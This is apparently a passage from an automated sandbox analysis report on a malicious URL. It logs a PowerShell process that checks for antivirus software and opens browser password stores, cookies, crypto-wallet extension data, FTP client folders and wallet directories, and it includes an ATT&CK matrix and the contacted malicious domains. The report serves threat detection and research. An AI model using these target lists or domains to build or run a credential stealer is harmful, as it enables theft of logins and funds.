        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\formhistory.sqlite
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\logins.json
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\prefs.js
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cert9.db
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\key4.db
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
        Tries to harvest and steal ftp login credentials
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
        Tries to steal Crypto Currency Wallets
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Binance
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation        		2
        Browser Extensions        		11
        Process Injection        		11
        Masquerading        		2
        OS Credential Dumping        		22
        Security Software Discovery        		Remote Services1
        Email Collection        		2
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        Registry Run Keys / Startup Folder        		1
        Registry Run Keys / Startup Folder        		231
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Process Discovery        		Remote Desktop Protocol31
        Data from Local System        		1
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		11
        Process Injection        		Security Account Manager231
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets11
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials33
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        https://escooterzone.com/play.html100%Avira URL Cloudmalware

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        e1.foiloverturnarrival.shop
        		172.67.194.161
        		truetrue
          		unknown
          escooterzone.com
          		188.114.97.3
          		truetrue
            		unknown
            a.nel.cloudflare.com
